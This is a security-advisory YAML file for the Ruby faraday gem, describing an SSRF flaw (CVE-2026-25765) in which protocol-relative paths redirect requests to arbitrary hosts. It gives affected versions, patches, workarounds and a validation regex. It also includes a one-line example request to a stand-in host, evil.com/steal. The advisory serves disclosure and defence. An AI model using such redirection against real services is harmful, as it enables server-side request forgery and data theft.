-
-
Notifications
You must be signed in to change notification settings - Fork 231
Expand file tree
/
Copy pathCVE-2026-25765.yml
More file actions
78 lines (67 loc) · 2.84 KB
/
CVE-2026-25765.yml
File metadata and controls
78 lines (67 loc) · 2.84 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
---
gem: faraday
cve: 2026-25765
ghsa: 33mh-2634-fwr2
url: https://github.com/lostisland/faraday/security/advisories/GHSA-33mh-2634-fwr2
title: Faraday affected by SSRF via protocol-relative URL host
override in build_exclusive_url
date: 2026-02-09
description: |
### Impact
Faraday's `build_exclusive_url` method (in `lib/faraday/connection.rb`)
uses Ruby's `URI#merge` to combine the connection's base URL with
a user-supplied path. Per RFC 3986, protocol-relative URLs
(e.g. `//evil.com/path`) are treated as network-path references
that override the base URL's host/authority component.
This means that if any application passes user-controlled input to
Faraday's `get()`, `post()`, `build_url()`, or other request
methods, an attacker can supply a protocol-relative URL like
`//attacker.com/endpoint` to redirect the request to an
arbitrary host, enabling Server-Side Request Forgery (SSRF).
The `./` prefix guard added in v2.9.2 (PR #1569) explicitly exempts
URLs starting with `/`, so protocol-relative URLs bypass it entirely.
**Example**
```ruby
conn = Faraday.new(url: 'https://api.internal.com')
conn.get('//evil.com/steal')
# Request is sent to https://evil.com/steal instead of api.internal.com
```
### Patches
Faraday v2.14.1 is patched against this security issue. All
versions of Faraday up to 2.14.0 are affected.
### Workarounds
**NOTE: Upgrading to Faraday v2.14.1+ is the recommended action
to mitigate this issue, however should that not be an option
please continue reading.**
Applications should validate and sanitize any user-controlled
input before passing it to Faraday request methods.
Specifically:
- Reject or strip input that starts with // followed by a
non-/ character.
- Use an allowlist of permitted path prefixes.
- Alternatively, prepend ./ to all user-supplied paths before
passing them to Faraday.
Example validation:
```ruby
def safe_path(user_input)
raise ArgumentError, "Invalid path" if user_input.match?(r{\A//[^/]})
user_input
end
```
cvss_v3: 5.8
patched_versions:
- "~> 1.10.5"
- ">= 2.14.1"
related:
url:
- https://nvd.nist.gov/vuln/detail/CVE-2026-25765
- https://github.com/lostisland/faraday/security/advisories/GHSA-33mh-2634-fwr2
- https://github.com/lostisland/faraday/releases/tag/v2.14.1
- https://github.com/lostisland/faraday/releases/tag/v1.10.5
- https://github.com/lostisland/faraday/pull/1569
- https://github.com/lostisland/faraday/commit/a6d3a3a0bf59c2ab307d0abd91bc126aef5561bc
- https://github.com/lostisland/faraday/commit/d0fc049beb0b0e4e3bd4a52711189130bba7c5f4
- https://www.rfc-editor.org/rfc/rfc3986#section-5.2.2
- https://www.rfc-editor.org/rfc/rfc3986#section-5.4
- https://advisories.gitlab.com/pkg/gem/faraday/CVE-2026-25765
- https://github.com/advisories/GHSA-33mh-2634-fwr2